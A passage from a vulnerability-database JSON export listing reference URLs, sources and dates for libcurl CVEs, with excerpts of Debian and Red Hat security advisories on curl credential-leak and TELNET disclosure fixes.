        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-6454"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20852"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-12450"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20483"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14336"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8619"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2020:4298"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8622"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-1010180"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-7598"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8681"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-3825"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8523"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-18074"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0169"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-6237"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-6706"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-20483"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20337"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8673"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8559"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8687"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-13822"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.6/updating/updating-cluster"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19923"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-16769"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8672"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-11023"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-11358"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-14822"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14404"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8608"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-7662"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8615"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-12449"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-7665"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8666"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8457"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-5953"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8689"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-15847"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-rel"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14498"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8735"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-11236"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19924"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8586"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12245"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14404"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8726"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-1010204"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8596"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8696"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8610"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-18408"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-13636"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-1563"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16890"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-11070"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14498"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-7149"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-12450"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-16056"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10739"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-20337"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-18074"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-11110"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8584"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19959"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8675"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8563"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10531"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-13232"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-3843"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14040"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-1010180"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-12449"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10715"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8609"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9283"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8587"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-18751"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8506"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-18624"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-11022"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8583"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-9251"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-12448"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-11008"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11459"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8597"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.2_release_notes/index"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2020:1792"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.8_release_notes/index"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2020:1020"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-156871"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-5436"
      },
      {
        "db": "BID",
        "id": "108435"
      },
      {
        "db": "PACKETSTORM",
        "id": "153051"
      },
      {
        "db": "PACKETSTORM",
        "id": "156753"
      },
      {
        "db": "PACKETSTORM",
        "id": "153003"
      },
      {
        "db": "PACKETSTORM",
        "id": "158035"
      },
      {
        "db": "PACKETSTORM",
        "id": "156523"
      },
      {
        "db": "PACKETSTORM",
        "id": "159727"
      },
      {
        "db": "PACKETSTORM",
        "id": "157425"
      },
      {
        "db": "PACKETSTORM",
        "id": "156986"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201905-933"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-5436"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-156871"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-5436"
      },
      {
        "db": "BID",
        "id": "108435"
      },
      {
        "db": "PACKETSTORM",
        "id": "153051"
      },
      {
        "db": "PACKETSTORM",
        "id": "156753"
      },
      {
        "db": "PACKETSTORM",
        "id": "153003"
      },
      {
        "db": "PACKETSTORM",
        "id": "158035"
      },
      {
        "db": "PACKETSTORM",
        "id": "156523"
      },
      {
        "db": "PACKETSTORM",
        "id": "159727"
      },
      {
        "db": "PACKETSTORM",
        "id": "157425"
      },
      {
        "db": "PACKETSTORM",
        "id": "156986"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201905-933"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-5436"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-05-28T00:00:00",
        "db": "VULHUB",
        "id": "VHN-156871"
      },
      {
        "date": "2019-05-28T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-5436"
      },
      {
        "date": "2019-05-22T00:00:00",
        "db": "BID",
        "id": "108435"
      },
      {
        "date": "2019-05-23T16:31:30",
        "db": "PACKETSTORM",
        "id": "153051"
      },
      {
        "date": "2020-03-16T13:55:33",
        "db": "PACKETSTORM",
        "id": "156753"
      },
      {
        "date": "2019-05-22T14:39:56",
        "db": "PACKETSTORM",
        "id": "153003"
      },
      {
        "date": "2020-06-11T16:34:00",
        "db": "PACKETSTORM",
        "id": "158035"
      },
      {
        "date": "2020-02-25T15:20:44",
        "db": "PACKETSTORM",
        "id": "156523"
      },
      {
        "date": "2020-10-27T16:59:02",
        "db": "PACKETSTORM",
        "id": "159727"
      },
      {
        "date": "2020-04-28T20:19:57",
        "db": "PACKETSTORM",
        "id": "157425"
      },
      {
        "date": "2020-03-31T19:42:22",
        "db": "PACKETSTORM",
        "id": "156986"
      },
      {
        "date": "2019-05-22T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201905-933"
      },
      {
        "date": "2019-05-28T19:29:06.127000",
        "db": "NVD",
        "id": "CVE-2019-5436"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-10-20T00:00:00",
        "db": "VULHUB",
        "id": "VHN-156871"
      },
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-5436"
      },
      {
        "date": "2019-05-22T00:00:00",
        "db": "BID",
        "id": "108435"
      },
      {
        "date": "2021-03-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201905-933"
      },
      {
        "date": "2024-11-21T04:44:55.937000",
        "db": "NVD",
        "id": "CVE-2019-5436"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201905-933"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Haxx libcurl Buffer error vulnerability",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201905-933"
      }
    ],
    "trust": 0.6
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "buffer error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201905-933"
      }
    ],
    "trust": 0.6
  }
}

VAR-202104-0334

Vulnerability from variot - Updated: 2026-03-09 22:32

curl 7.1.1 to and including 7.75.0 is vulnerable to an "Exposure of Private Personal Information to an Unauthorized Actor" by leaking credentials in the HTTP Referer: header. libcurl does not strip off user credentials from the URL when automatically populating the Referer: HTTP request header field in outgoing HTTP requests, and therefore risks leaking sensitive data to the server that is the target of the second HTTP request. This could lead to exposure of the credentials to the server to which requests were redirected. (CVE-2021-22876) A vulnerability was found in curl where a flaw in the option parser for sending NEW_ENV variables libcurl can pass uninitialized data from a stack-based buffer to the server. This issue leads to potentially revealing sensitive internal information to the server using a clear-text network protocol. The highest threat from this vulnerability is to confidentiality. (CVE-2021-22898).

CVE-2020-8177

sn reported that curl could be tricked by a malicious server into
overwriting a local file when using th -J (--remote-header-name) and
-i (--include) options in the same command line.

CVE-2020-8231

Marc Aldorasi reported that libcurl might use the wrong connection
when an application using libcurl's multi API sets the option
CURLOPT_CONNECT_ONLY, which could lead to information leaks.

CVE-2020-8284

Varnavas Papaioannou reported that a malicious server could use the
PASV response to trick curl into connecting back to an arbitrary IP
address and port, potentially making curl extract information about
services that are otherwise private and not disclosed.

CVE-2020-8285

xnynx reported that libcurl could run out of stack space when using
tha FTP wildcard matching functionality (CURLOPT_CHUNK_BGN_FUNCTION).

CVE-2020-8286

It was reported that libcurl didn't verify that an OCSP response
actually matches the certificate it is intended to.

CVE-2021-22890

Mingtao Yang reported that, when using an HTTPS proxy and TLS 1.3,
libcurl could confuse session tickets arriving from the HTTPS proxy
as if they arrived from the remote server instead. This could allow
an HTTPS proxy to trick libcurl into using the wrong session ticket
for the host and thereby circumvent the server TLS certificate check.

For the stable distribution (buster), these problems have been fixed in version 7.64.0-4+deb10u2.

We recommend that you upgrade your curl packages.

For the detailed security status of curl please refer to its security tracker page at: https://security-tracker.debian.org/tracker/curl

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEBsId305pBx+F583DbwzL4CFiRygFAmBkQCoACgkQbwzL4CFi Ryg6Gg/+LqhhJ8+D7skevVkYzxHzdH2yT/XMeoYp0D37yHmEfH9PyjXwfplG+XEw /xwFRBK8qxD1ja+rQddYyeTvi1OMnMgMS3UsRHlfeMnLxh2+oHnvHDYG848npUEZ Rq4YFoc/n9YTAJZP/G4oiuBeXqH2Sqa5hSNT6VrYfRciCxkYnzA78b85KpI8aYyR lhfiJMNpwrqDbt/QzblpELBkGMIV402VeiqDwHfcVzm2E810xXQNLvPMbWtvDYkA TSrNsdqfuFr1tuQSZY6CGSWEyXtB/tOo8+pvUixlJMBWJMl5TXEcJkD5ckehx0yb C3n9yapfklxHiG9lD4zwwIJDqd3Y4SxdDiSlUC4OhdvpwniMygX0S3ICaPA4iac/ cWanml0Fop3OmRy+vQURTd3sADoT5HoRSUXZVU+HdTrRaEt2xs5okZkWSd3yr4Ux i+HgjUAFkkk8DLRB68Bbpx1LGxFGQT7L8yd4wsWINXlzASIP1A5dnNfE5w0VWOHG 3KDq47wNfjuiZC8GXW+HQCxz5MijnS8Y/Egl0OozNFDwEitNBZEsIjpZaZBdZIwi UFfcK7+u/y/TRY54rA4erkdcHFwpYW5EZVGdb7Z+WPWVlzw0ImXrM68LSAhHQaqW 1Hx4VwwwTsMIPnrx2kriRiiDPOW1r5Kip3yHa+QZLedSRGibQWk= =001T -----END PGP SIGNATURE----- . Bugs fixed (https://bugzilla.redhat.com/):

1944888 - CVE-2021-21409 netty: Request smuggling via content-length header 2004133 - CVE-2021-37136 netty-codec: Bzip2Decoder doesn't allow setting size restrictions for decompressed data 2004135 - CVE-2021-37137 netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessary way 2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value

JIRA issues fixed (https://issues.jboss.org/):

LOG-1897 - Applying cluster state is causing elasticsearch to hit an issue and become unusable LOG-1925 - [release-5.3] No datapoint for CPU on openshift-logging dashboard LOG-1962 - [release-5.3] CLO panic: runtime error: slice bounds out of range [:-1]

Summary:

An update for curl is now available for Red Hat Enterprise Linux 8. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64

Description:

The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, and LDAP.

Security Fix(es):

curl: Leak of authentication credentials in URL via automatic Referer (CVE-2021-22876)
curl: TELNET stack contents disclosure (CVE-2021-22898)
curl: Incorrect fix for CVE-2021-22898 TELNET stack contents disclosure (CVE-2021-22925)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Additional Changes:

For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.5 Release Notes linked from the References section. Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

Bugs fixed (https://bugzilla.redhat.com/):

1941964 - CVE-2021-22876 curl: Leak of authentication credentials in URL via automatic Referer 1947493 - Why there is a difference between curl --head output on the RHEL7 and RHEL8. 1964887 - CVE-2021-22898 curl: TELNET stack contents disclosure 1970902 - CVE-2021-22925 curl: Incorrect fix for CVE-2021-22898 TELNET stack contents disclosure

Package List:

Red Hat Enterprise Linux BaseOS (v. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

Clusters and applications are all visible and managed from a single console — with security policy built in. See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.2/html/release_notes/

Security updates:

object-path: Type confusion vulnerability can lead to a bypass of CVE-2020-15256 (CVE-2021-23434)
follow-redirects: Exposure of Private Personal Information to an Unauthorized Actor (CVE-2022-0155)

Related bugs:

RHACM 2.2.11 images (Bugzilla #2029508)
ClusterImageSet has 4.5 which is not supported in ACM 2.2.10 (Bugzilla

2030859)

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis: Moderate: Gatekeeper Operator v0.2 security updates and bug fixes Advisory ID: RHSA-2022:1081-01 Product: Red Hat ACM Advisory URL: https://access.redhat.com/errata/RHSA-2022:1081 Issue date: 2022-03-28 CVE Names: CVE-2019-5827 CVE-2019-13750 CVE-2019-13751 CVE-2019-17594 CVE-2019-17595 CVE-2019-18218 CVE-2019-19603 CVE-2019-20838 CVE-2020-12762 CVE-2020-13435 CVE-2020-14155 CVE-2020-16135 CVE-2020-24370 CVE-2021-3200 CVE-2021-3445 CVE-2021-3521 CVE-2021-3580 CVE-2021-3712 CVE-2021-3800 CVE-2021-3999 CVE-2021-20231 CVE-2021-20232 CVE-2021-22876 CVE-2021-22898 CVE-2021-22925 CVE-2021-23177 CVE-2021-28153 CVE-2021-31566 CVE-2021-33560 CVE-2021-36084 CVE-2021-36085 CVE-2021-36086 CVE-2021-36087 CVE-2021-42574 CVE-2021-43565 CVE-2022-23218 CVE-2022-23219 CVE-2022-23308 CVE-2022-23806 CVE-2022-24407 ==================================================================== 1. Summary:

Gatekeeper Operator v0.2

Description:

Gatekeeper Operator v0.2

Gatekeeper is an open source project that applies the OPA Constraint Framework to enforce policies on your Kubernetes clusters.

This advisory contains the container images for Gatekeeper that include security updates, and container upgrades.

Note: Gatekeeper support from the Red Hat support team is limited cases where it is integrated and used with Red Hat Advanced Cluster Management for Kubernetes. For support options for any other use, see the Gatekeeper open source project website at: https://open-policy-agent.github.io/gatekeeper/website/docs/howto/.

Security updates:

golang.org/x/crypto: empty plaintext packet causes panic (CVE-2021-43565)
golang: crypto/elliptic IsOnCurve returns true for invalid field elements (CVE-2022-23806)
Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied.

The requirements to apply the upgraded images are different whether or not you used the operator. Complete the following steps, depending on your installation:

- Upgrade gatekeeper operator: The gatekeeper operator that is installed by the gatekeeper operator policy has installPlanApproval set to Automatic. This setting means the operator will be upgraded automatically when there is a new version of the operator. No further action is required for upgrade. If you changed the setting for installPlanApproval to manual, then you must view each cluster to manually approve the upgrade to the operator.
- Upgrade gatekeeper without the operator: The gatekeeper version is specified as part of the Gatekeeper CR in the gatekeeper operator policy. To upgrade the gatekeeper version: a) Determine the latest version of gatekeeper by visiting: https://catalog.redhat.com/software/containers/rhacm2/gatekeeper-rhel8/5fadb4a18d9a79d2f438a5d9. b) Click the tag dropdown, and find the latest static tag. An example tag is 'v3.3.0-1'. c) Edit the gatekeeper operator policy and update the image tag to use the latest static tag. For example, you might change this line to image: 'registry.redhat.io/rhacm2/gatekeeper-rhel8:v3.3.0-1'.

Refer to https://open-policy-agent.github.io/gatekeeper/website/docs/howto/ for additional information.

Bugs fixed (https://bugzilla.redhat.com/):

2030787 - CVE-2021-43565 golang.org/x/crypto: empty plaintext packet causes panic 2053429 - CVE-2022-23806 golang: crypto/elliptic IsOnCurve returns true for invalid field elements

References:

https://access.redhat.com/security/cve/CVE-2019-5827 https://access.redhat.com/security/cve/CVE-2019-13750 https://access.redhat.com/security/cve/CVE-2019-13751 https://access.redhat.com/security/cve/CVE-2019-17594 https://access.redhat.com/security/cve/CVE-2019-17595 https://access.redhat.com/security/cve/CVE-2019-18218 https://access.redhat.com/security/cve/CVE-2019-19603 https://access.redhat.com/security/cve/CVE-2019-20838 https://access.redhat.com/security/cve/CVE-2020-12762 https://access.redhat.com/security/cve/CVE-2020-13435 https://access.redhat.com/security/cve/CVE-2020-14155 https://access.redhat.com/security/cve/CVE-2020-16135 https://access.redhat.com/security/cve/CVE-2020-24370 https://access.redhat.com/security/cve/CVE-2021-3200 https://access.redhat.com/security/cve/CVE-2021-3445 https://access.redhat.com/security/cve/CVE-2021-3521 https://access.redhat.com/security/cve/CVE-2021-3580 https://access.redhat.com/security/cve/CVE-2021-3712 https://access.redhat.com/security/cve/CVE-2021-3800 https://access.redhat.com/security/cve/CVE-2021-3999 https://access.redhat.com/security/cve/CVE-2021-20231 https://access.redhat.com/security/cve/CVE-2021-20232 https://access.redhat.com/security/cve/CVE-2021-22876 https://access.redhat.com/security/cve/CVE-2021-22898 https://access.redhat.com/security/cve/CVE-2021-22925 https://access.redhat.com/security/cve/CVE-2021-23177 https://access.redhat.com/security/cve/CVE-2021-28153 https://access.redhat.com/security/cve/CVE-2021-31566 https://access.redhat.com/security/cve/CVE-2021-33560 https://access.redhat.com/security/cve/CVE-2021-36084 https://access.redhat.com/security/cve/CVE-2021-36085 https://access.redhat.com/security/cve/CVE-2021-36086 https://access.redhat.com/security/cve/CVE-2021-36087 https://access.redhat.com/security/cve/CVE-2021-42574 https://access.redhat.com/security/cve/CVE-2021-43565 https://access.redhat.com/security/cve/CVE-2022-23218 https://access.redhat.com/security/cve/CVE-2022-23219 https://access.redhat.com/security/cve/CVE-2022-23308 https://access.redhat.com/security/cve/CVE-2022-23806 https://access.redhat.com/security/cve/CVE-2022-24407 https://access.redhat.com/security/updates/classification/#moderate https://open-policy-agent.github.io/gatekeeper/website/docs/howto/

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iQIVAwUBYkHUf9zjgjWX9erEAQiizw//XXMOXR1Xe/Fp6uV2DCknXEAWJbYuGV43 9a87QSq5ob3vbqGGXQXLU6ENjFtAx37/+5+UqAVbzcj+LQ0lV6Ny9rVzolDT4ltG k7J/BUd/kyr9G5gbiih3D/tm8dLh/rLft8FKgB+hEw+NcXnFlEvW5iEymqAsyH/D mrcgCrASFoWG4S4/JC+g8r1TRHAJj4ERAy4ZpDqn/eoOWY3jD+rPv1VD5Z+XaE07 +jw+mvZukP2l0374Yn3W+g7uVOZ5RSqSpEzBZoSy3ffYAqpK+oQ7eN19DOW7l3tr Ko/4h4OmLcOtIRedyt86xJe+zY7Ovo1cRP1TUgRapZGpTCPjaQ/okOhAIh03uxrx ceCawNnagBB1iglJl29GNRUUUU0JWhbEPDLepSjfsyOwkJxvtUulC/W+RJVfpE7Q LimNdHDJbFWN1x4IujdJNOCjPnBj6sG84PxLIjx5hM07ARRCBfrHutmlBm6Aq8Ej mcNPudtyufYuAqcNx8Pe04kwRmzeukNm/qVvr+ywG1+Rp4yo3mkxplZY+5z7S2sH vsciDeEGg6CAh7Sm/zfN3fpvNei1WhzcSxKsHMLB40ASJU2sMe1tt9b2pPhaHfXK lYnIN38GSqlQUjvb1jy8ymzOT3+73uCjYQrVbsGXoevb1639pasWv5i9dyx27kPb 1PnhEG7/jO4=XPu4 -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Description:

Red Hat Openshift GitOps is a declarative way to implement continuous deployment for cloud native applications. Bugs fixed (https://bugzilla.redhat.com/):

2050826 - CVE-2022-24348 gitops: Path traversal and dereference of symlinks when passing Helm value files

Red Hat OpenShift Container Storage is highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Container Storage provides a multicloud data management service with an S3 compatible API.

Bug Fix(es):

Previously, when the namespace store target was deleted, no alert was sent to the namespace bucket because of an issue in calculating the namespace bucket health. With this update, the issue in calculating the namespace bucket health is fixed and alerts are triggered as expected. (BZ#1993873)
Previously, the Multicloud Object Gateway (MCG) components performed slowly and there was a lot of pressure on the MCG components due to non-optimized database queries. With this update the non-optimized database queries are fixed which reduces the compute resources and time taken for queries. Bugs fixed (https://bugzilla.redhat.com/):

1993873 - [4.8.z clone] Alert NooBaaNamespaceBucketErrorState is not triggered when namespacestore's target bucket is deleted 2006958 - CVE-2020-26301 nodejs-ssh2: Command injection by calling vulnerable method with untrusted input

Summary:

The Migration Toolkit for Containers (MTC) 1.5.2 is now available. Description:

The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):

2000734 - CVE-2021-3757 nodejs-immer: prototype pollution may lead to DoS or remote code execution 2005438 - Combining Rsync and Stunnel in a single pod can degrade performance (1.5 backport) 2006842 - MigCluster CR remains in "unready" state and source registry is inaccessible after temporary shutdown of source cluster 2007429 - "oc describe" and "oc log" commands on "Migration resources" tree cannot be copied after failed migration 2022017 - CVE-2021-3948 mig-controller: incorrect namespaces handling may lead to not authorized usage of Migration Toolkit for Containers (MTC)

Bugs fixed (https://bugzilla.redhat.com/):

1992006 - CVE-2021-29923 golang: net: incorrect parsing of extraneous zero characters at the beginning of an IP address octet 1995656 - CVE-2021-36221 golang: net/http/httputil: panic due to racy read of persistConn after handler panic

JIRA issues fixed (https://issues.jboss.org/):

TRACING-2235 - Release RHOSDT 2.1

Show details on source website

JSON

To clipboard

{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "32"
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.0.0"
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "8.2.0"
      },
      {
        "_id": null,
        "model": "sinec infrastructure network services",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "1.0.1.1"
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.0.6"
      },
      {
        "_id": null,
        "model": "communications billing and revenue management",
        "scope": "eq",
        "trust": 1.0,
